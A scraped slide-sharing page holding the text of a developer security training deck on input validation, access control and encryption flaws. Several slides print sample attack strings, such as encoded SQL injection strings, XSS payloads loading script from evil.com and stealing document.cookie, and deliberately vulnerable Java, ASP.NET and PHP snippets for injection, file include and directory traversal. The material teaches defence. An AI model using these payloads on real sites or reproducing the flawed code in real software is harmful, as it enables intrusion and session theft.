Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 

Fundamental Application and Website Security

  • 1. Application and Website Security – Fundamental Edition Daniel Owens IT Security Professional
  • 2. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 3. Purpose Drum up interest Session Prerequisites None
  • 4. Communication Media and Security Concerns Communication media: „Wired‟ networks „Wireless‟ networks Security concerns: The Insider The Outsider The Technology Nature
  • 5. A Note About Security Security helps functionality – if it doesn’t help functionality, it isn’t security. -Daniel Owens
  • 6. Consequences of Poor Security Stolen intellectual property System downtime Lost productivity Damage to NASA‟s reputation Lost public confidence Lost revenue Congressional inquiries
  • 7. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 8. SQL | LDAP Injection SQL and LDAP Injection The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists Example Strings include: 1‟1 %31%27%20%4F%52%20%27%31%27%3D%27%31 &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61& #39&#49 *(|(mail=*))
  • 9. Java SQL Injection static void main(String[] args){ Connection conn=null; String username=args[0]; String password=args[1]; String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”; conn=DriverManager.getConnection(“jdbc:odbc:l ogistics”,”admin”,”LetMeIn”); Statement stmnt=conn.createStatement(); ResultSet rs=stmnt.executeQuery(query); … }
  • 10. Demonstration 1 SQL Injection Bypassing Security Checks
  • 11. Case Study 1 SQL Injection Owning Networks
  • 12. Cross-Site Scripting (XSS) XSS The injection of client-side code Comes in three kinds: Persistent Non-Persistent DOM Only occurs when user input influences the output Can be stopped by assuming all input is malicious until proven otherwise through a whitelist Can lead to a complete system compromise – for
  • 13. Cross-Site Scripting (cont.) XSS (cont.) Sample strings: <script src=http://evil.com/attack.js << </script << <link rel=“stylesheet” href=http://evil.com/attack.css> %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E <img src=”” onMouseOver=”alert(document.cookie)”; />
  • 14. ASP.NET Cross-Site Scripting <%@ Page Language="C#" ValidateRequest="false" %> <html> <script runat="server"> void btnSubmit_Click(Object sender, EventArgs e) { Response.Write(txtString.Text); } </script> // CONTINUED ON NEXT SLIDE
  • 15. ASP.NET Cross-Site Scripting (cont.) // CONTINUED FROM PREVIOUS SLIDE <body> <form id="form1" runat="server"> <asp:TextBox id="txtString" runat="server" Text="<script>alert(„hi‟);</script>" /> <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" /> </form> </body> </html>
  • 16. Demonstration 2 XSS Having Fun
  • 17. Remote File Include/Execution | Code Injection Remote File Include and Execution An attacker tricks the system into including and/or executing arbitrary files Code Injection Attacker tricks the system into executing arbitrary code by injecting the commands into the code Both Code of the attacker‟s choosing is executed Contrary to popular belief, ANY language can suffer this
  • 18. PHP Remote File Include <?php …. require_once($_GET[„config‟]); require_once($_GET[„base‟].”/index.php”); …. ?>
  • 19. ASP.NET Remote File Include <% …. set url = Request.QueryString; set xml =Server.CreateObject(“Microsoft.XMLHTTP”); xml.open “GET”, url, false xml.send “” Response.write xml.responseText set xml = nothing …. %>
  • 20. Hidden Elements | Cookies Hidden Elements and Cookies Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view They do not provide secure storage They are not immutable storage locations Neither should contain sensitive information Both should be considered malicious until proven otherwise Any data in it should not be directly used for output Whitelisting should be used to prove innocence
  • 21. Hidden Elements | Cookies (cont.) Hidden Elements and Cookies (cont.) &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Log in.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErr orddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_Use r2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
  • 22. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 23. Session Hijacking – Cookie Theft Cookie Theft The theft of a client‟s cookies by an attacker Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc Can be hampered if mechanisms such as NONCEs are used NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information Additional mechanisms include using secure cookies, but this has limited impact
  • 24. Session Hijacking – Session Fixation Session Fixation An attacker uses a „known‟ session ID Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session This is often a phishing or other social engineering attack Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly Difficult to stop if sessions are guessable
  • 26. Directory Traversal Directory Traversal An attacker is able to trick the system into traversing the directory structure In many instances, arbitrary files can be viewed Attackers are often attempting to execute a file or gather information If user input dictates the output, care must be taken to ensure the input is „valid‟ Whitelists become invaluable In extreme cases, an attacker can actually use this to gain administrator access to the server
  • 27. PHP Directory Traversal <?php …. $date=$_GET[„date‟]; if($handle=fopen(“calendar/$date”,”rb”)){ print(fread($handle,filesize(“calendar/$date”))); fclose($handle); } …. ?>
  • 28. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 29. Session Hijacking – Spoofing Spoofing Pretending to be someone else, an attacker attempts to gain the victim‟s privileges Comes in three basic forms Blind (write-only) Half pipe (read-only) Full pipe Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
  • 31. Case Study 2 Session Hijacking Spoofing
  • 32. Weak Encryption | Using Encoding Weak/Home-Grown Encryption The use of weak and home grown encryption has led to the compromise of many systems It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial Encoding The use of algorithms that take output and simply change the format (normally it is the number of bits used per character) This is not secure by any means
  • 33. Case Study 3 Weak Encryption | Encoding XOR SHA Base64
  • 34. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion and Appendices
  • 35. Security Compass XSS-Me A free Firefox plug-in Performs semi-automated XSS attacks against POST fields SQL Inject-Me A free Firefox plug-in Performs semi-automated SQL injection attacks against POST fields Access-Me A free Firefox plug-in…
  • 36. Other Firefox Add-ons Web Developer Add-on Free Let‟s you view source files cleanly and easily Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh) Let‟s you view and modify form fields and cookie data Tamper Data Free Let‟s you modify most request data
  • 37. Fuzzers BED.pl Free Perl script Performs basic tests of your SERVER JBroFuzz Free Java application Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion Powerfuzzer Free and commercial versions (Python script) Easy and multi-talented… automated
  • 38. Other Tools Sothink SWF Decompiler Decompiles any Adobe Flash or Flux script Cavaj Free Decompiles any Java program Nikto Free Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
  • 39. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 40. For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security SANS Top-20 (IT Professionals) http://www.sans.org/top20/
  • 41. For More Information (cont.) Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers) http://cwe.mitre.org/top25/index.html GRC IT Security Office http://itsecurity.grc.nasa.gov Most Common Software Errors http://discussweb.com/software-testing/803-most- common-software-errors.html
  • 42. Acknowledgements I stole the background from Microsoft I stole a lot from my experiences and previous writings

Notas do Editor

  1. The above code illustrates a SQL injection vulnerability
  2. The code here is vulnerable to XSS
  3. The code here is vulnerable to remote include in two locations
  4. The code here is vulnerable to a remote include
  5. The code here is vulnerable to directory traversal